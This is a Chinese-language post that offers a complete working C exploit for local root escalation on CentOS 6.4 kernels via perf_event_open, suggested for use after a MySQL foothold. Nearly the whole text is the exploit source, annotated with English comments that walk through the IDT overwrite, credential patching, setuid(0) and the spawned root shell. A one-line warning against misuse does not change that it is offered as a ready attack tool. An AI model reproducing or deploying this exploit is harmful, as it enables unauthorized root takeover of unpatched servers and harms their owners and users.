CentOS 6.4 内核版本 2.6.3.2 EXP

可以配合 MySQL 使用该 EXP 提权到 Root

 1 #define _GNU_SOURCE 1
 2 #include <stdint.h>
 3 #include <stdio.h>
 4 #include <stdlib.h>
 5 #include <string.h>
 6 #include <unistd.h>
 7 #include <sys/mman.h>
 8 #include <syscall.h>
 9 #include <stdint.h>
10 #include <assert.h>
11 
12 #define BASE  0x380000000
13 #define SIZE  0x010000000
14 #define KSIZE  0x2000000
15 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
16 
 /*
  * Payload block.  main() copies the first 1024 bytes of this function's
  * compiled image into the RWX `code` mapping (memcpy(code, &fuck, 1024))
  * and afterwards executes `int $0x4`; because the raw machine code is what
  * gets copied, this function must stay position-independent and under
  * 1024 bytes, and any edit here changes the copied image.
  * The AB(n) constants are search markers that main() overwrites in place
  * before the copy is used (AB(1) -> idt.addr + 0x48, AB(2..5) -> (gid<<32)|uid).
  * Everything below assumes a specific kernel stack/data layout; called as an
  * ordinary user-mode function it is undefined behaviour.
  */
 17 void fuck() {
 18   int i,j,k;
 19   uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
      /* Pointer stored at the 8 KiB-aligned base of the stack that holds
         `uids`; assumes the executing stack has that layout — TODO confirm
         per kernel version. */
 20   uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
 21   uint64_t kbase = ((uint64_t)current)>>36;   /* top bits, used only as an address-range filter below */
 22   uint32_t *fixptr = (void*) AB(1);           /* patched by main() to idt.addr + 0x48 before use */
 23   *fixptr = -1;
 24 
      /* Scan the first 4000 bytes of `current` (4-byte steps) for two equal
         adjacent 8-byte words whose top bits match kbase. */
 25   for (i=0; i<4000; i+=4) {
 26     uint64_t *p = (void *)&current[i];
 27     uint32_t *t = (void*) p[0];
 28     if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
        /* Look for the 8 x 32-bit marker words of `uids` at offsets 0..19 of
           the pointed-to block.  On a match: clear those 8 words, set the 10
           words after a one-word gap (t[j+9..j+18]) to -1, and return.
           The two inner loops reuse `i` as their index, shadowing the outer
           counter; harmless only because the function returns right after. */
 29     for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
 30       if (((uint32_t*)uids)[k] != t[j+k]) goto next;
 31       for (i = 0; i < 8; i++) t[j+i] = 0;
 32       for (i = 0; i < 10; i++) t[j+9+i] = -1;
 33       return;
 34 next:;    }
 35   }
 36 }
37 
 /*
  * Issues raw syscall 298 — perf_event_open on x86_64 (the number is
  * hard-coded, so this is not portable to other architectures) — with `buf`
  * passed as the attr argument, pid 0, cpu -1, group_fd -1, flags 0, and then
  * closes the returned descriptor.
  *
  * @param off  second 64-bit word of the attr block; callers pass -1, -2 and
  *             one computed value.  The other populated words (0x4800000001,
  *             0x300) are hard-coded for the targeted kernel ABI.
  *
  * Note: close() is evaluated inside assert().  Built with -DNDEBUG the fd is
  * never closed; when the syscall fails (fd == -1) close() fails and the
  * assert aborts the process instead of reporting an error.
  */
 38 void sheep(uint32_t off) {
 39   uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };   /* remaining words zero-initialised */
 40   int fd = syscall(298, buf, 0, -1, -1, 0);
 41   assert(!close(fd));
 42 }
43 
44 
 /*
  * Driver.  Visible sequence: map a zeroed RW region at BASE, call sheep()
  * twice with negative offsets and find the first word that changed, read the
  * IDT base with `sidt`, map an RWX region at the low 32 bits of that base
  * (masked to 16 MiB), NOP-fill it and place fuck()'s code at its end behind a
  * 13-byte machine-code prologue, patch the AB() markers, call sheep() once
  * more with an offset derived from the IDT base and the scan index, raise
  * `int $0x4`, and exec /bin/bash.
  * Every constant (syscall 298, the 0x32 mmap flags, 0x48, 0x80000000, the
  * prologue bytes) is tied to one x86_64 Linux kernel/ABI generation; the
  * precondition is unprivileged access to perf_event_open on an unpatched
  * kernel — NOTE(review): whether kernel.perf_event_paranoid alone removes
  * it depends on the kernel, confirm before relying on it.
  * Several calls with side effects sit inside assert(), so a -DNDEBUG build
  * silently skips the mmap/memmem/setuid steps.
  */
 45 int  main() {
 46   uint64_t  u,g,needle, kbase, *p; uint8_t *code;
 47   uint32_t *map, j = 5;
 48   int i;
      /* Image of IDTR as stored by `sidt`: 16-bit limit followed by 64-bit base. */
 49   struct {
 50     uint16_t limit;
 51     uint64_t addr;
 52   } __attribute__((packed)) idt;
      /* prot 3 = PROT_READ|PROT_WRITE; flags 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS (Linux values). */
 53   assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
 54   memset(map, 0, SIZE);
 55   sheep(-1); sheep(-2);
      /* Locate the first word of `map` the two calls above modified; `i` keeps that index. */
 56   for (i = 0; i < SIZE/4; i++) if (map[i]) {
 57     assert(map[i+1]);
 58     break;
 59   }
 60   assert(i<SIZE/4);
 61   asm ("sidt %0" : "=m" (idt));   /* user-mode sidt; under UMIP the value is not the real base — TODO confirm */
 62   kbase = idt.addr & 0xff000000;   /* low 32 bits of the IDT base, 16 MiB aligned */
 63   u = getuid(); g = getgid();
      /* prot 7 = PROT_READ|PROT_WRITE|PROT_EXEC, fixed at that low address. */
 64   assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
      /* Fill with 0x90 (NOP), then copy the first 1024 bytes of fuck()'s compiled image to the top of the region. */
 65   memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
      /* 13 bytes of raw x86-64 machine code placed directly before the payload.
         The copy length is printf()'s return value (40 chars) mod 27 == 13, so
         it silently depends on the banner text staying exactly this long. */
 66   memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
 67     printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
 68   setresuid(u,u,u); setresgid(g,g,g);   /* return values are not checked */
      /* j runs 4..0: overwrite each AB(j+1) marker inside the copied payload.
         AB(1) (j == 0) becomes idt.addr + 0x48, the others (gid<<32)|uid.
         `if (!p) continue;` is unreachable after the assert unless NDEBUG is set. */
 69   while (j--) {
 70     needle = AB(j+1);
 71     assert(p = memmem(code, 1024, &needle, 8));
 72     if (!p) continue;
 73     *p = j?((g<<32)|u):(idt.addr + 0x48);
 74   }
      /* Offset built from the scan index and the low 32 bits of the IDT base;
         the 64-bit result is truncated to sheep()'s uint32_t parameter. */
 75   sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
 76   asm("int $0x4");  assert(!setuid(0));   /* software interrupt 4; then asserts setuid(0) succeeds */
 77   return execl("/bin/bash", "-sh", NULL);   /* argv[0] "-sh"; returns only if exec fails */
 78 }

注意:本代码具有极强攻击性,请勿作死!
